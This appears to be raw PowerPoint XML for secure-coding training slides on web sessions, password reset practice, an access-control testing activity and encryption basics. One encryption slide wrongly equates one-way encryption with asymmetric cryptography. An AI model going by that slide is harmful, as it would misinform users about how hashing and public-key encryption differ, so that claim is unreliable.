                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1000" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>Management</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35E7F919-0A71-4832-97DD-DCCE4D09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6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E9831A-1EB9-4F3A-A595-8EF3E6E47C44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49B92BF5-BA1C-4DB2-8567-F9463CBDABA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302040"/>
            <a:ext cx="4763475" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simple websites:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t need to track user information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Just returns same static pages to every user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modern web applications:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide customized content for each user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Require that the server track the state of interactions with each user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One user might have data on the server that another user should not have access to, such as account information, settings, credit card data, and so forth.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The server must know:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Which user it is interacting with.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What that user is currently in the process of doing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is facilitated through web sessions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP is stateless</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies manage web sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser receives a cookie (text file) from the web site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Returns the cookie each time it connects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this way a user is identified and their behavior tracked</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2F577F2-1AAC-4F3D-8948-A0A3D3E2D7F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Sessions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EDF7A76-A525-4661-B8D5-9463CC470D07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5334000" y="1359480"/>
            <a:ext cx="3511296" cy="2272099"/>
            <a:chOff x="5334000" y="1156901"/>
            <a:chExt cx="3511296" cy="2272099"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9BB9D10-0A88-4435-B7B9-330B34AFD0D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5334000" y="1219200"/>
              <a:ext cx="3511296" cy="2209800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2AD4FF"/>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5" name="Group 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F7D4212-3330-4C12-87DD-80F3FF072307}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5334000" y="1371600"/>
              <a:ext cx="3511296" cy="1828800"/>
              <a:chOff x="5334000" y="1371600"/>
              <a:chExt cx="3511296" cy="1828800"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="1028" name="Picture 4" descr="https://cdn.pixabay.com/photo/2017/03/18/05/38/cloud-computing-2153286_960_720.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CF034EE-2AA7-40ED-B98E-A164B5E07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371600"/>
                <a:ext cx="351129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eb">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D74FEFB8-0506-4A84-8242-20F0C0ABA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354" y="1868642"/>
                <a:ext cx="869796" cy="86979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5532F1B7-49B3-4AEA-85F3-B425DC86F427}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6797040" y="1156901"/>
              <a:ext cx="651140" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Session</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AF97589-27B9-4797-8A53-6ABE2796D4F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8092440" y="1315240"/>
              <a:ext cx="651140" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Session</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC9CCC7F-D69E-4BD7-B6B7-25F3EE51B26D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5440680" y="1345720"/>
              <a:ext cx="651140" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Session</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF76BE45-7A50-4E08-9995-8250D6371846}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5455920" y="2732560"/>
              <a:ext cx="651140" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Session</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FEDD811-5883-479E-8545-18BA56646741}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8134253" y="2764379"/>
              <a:ext cx="651140" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Session</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{320CBAE7-DB68-428F-AC3D-BD37B469DB64}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6828204" y="3148981"/>
              <a:ext cx="651140" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Session</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1144005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Password Management (Slide 2 of 2)</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19200"/>
            <a:ext cx="6897076" cy="5023338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Support sufficiently random answers for password reset questions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If using email-based resets, only send email to a pre-registered address with a temporary link/password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide a short expiration time for temporary passwords and links.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Require temporary passwords to be changed on the next use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Notify users when their password has been reset (outside of the application, using their pre-registered email address, for example).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enforce password changes based on requirements established in policies and regulations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change all default passwords and user IDs provided with the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>development platform or services.</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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{030C9899-0690-47AE-AE44-D1CC23715785}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-9832" y="1160208"/>
            <a:ext cx="1991032" cy="1151641"/>
            <a:chOff x="-2445" y="3873609"/>
            <a:chExt cx="2031700" cy="1175164"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70D4C1E2-8AD8-4229-97B5-989671C9D393}"/>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4E2CD111-947E-47B7-898D-D885888ED226}"/>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Password</a:t>
              </a:r>
              <a:br>
                <a:rPr kumimoji="0" lang="en-US" sz="1000" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1000" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>Management</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35E7F919-0A71-4832-97DD-DCCE4D09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97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Authentication and access control are important protections against unauthorized access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You'll assess the quality of the authentication and access control features in the Catalog application by attempting to perform administrative tasks without having an administrative account.</a:t>
            </a:r>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Activity: Handling Authentication and Authorization Defects</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819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3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2001F-DB7D-467E-A634-E09CC04E23C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>32</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A45F6994-8FB7-4F3A-B1F9-7318440CAF78}"/>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461D3EE3-9732-4CBB-BB00-BF04235AD997}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect Data in Transit And at Rest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1541296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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1072072"/>
            <a:ext cx="8460150" cy="5555960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Best way to protect data in its various states:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At rest (stored disk or other storage media)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In transit (being transmitted across the network)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In use (loaded into memory)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Converts data from plain, or cleartext form, into coded, or ciphertext form.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only authorized parties with the necessary decryption information can decode and read the data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One-way (asymmetric)—the encryption is designed to hide only the cleartext and is never decrypted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two-way (symmetric)—the ciphertext can be decrypted back to cleartext and read.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encryption (Slide 1 of 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3750036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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1072072"/>
            <a:ext cx="8460150" cy="5555960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are many ways to encrypt data: substituting characters, transposing the position of the characters, hiding the plaintext (steganography), or using complex mathematical functions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provides a way to protect data, even when it is potentially exposed in transit or in storage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A cryptographic key:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is a specific piece of information that is used with an algorithm to perform encryption and decryption.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May be of various lengths, depending on the cryptographic algorithm used and the amount of protection required.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Must be used to decrypt ciphertext even with a known algorithm.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An encryption algorithm:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is the software routine used to encrypt data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses complex mathematical functions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May be based on very large prime numbers to eliminate repeat patterns, making it hard to analyze and figure out.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: RSA encryption algorithm, used in e-commerce, is based on prime numbers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encryption (Slide 2 of 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="440320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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1072072"/>
            <a:ext cx="8460150" cy="5555960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The stronger and more complex the algorithm, the more difficult it is to break the encryption.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In general, if the key is longer, the encryption will be:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
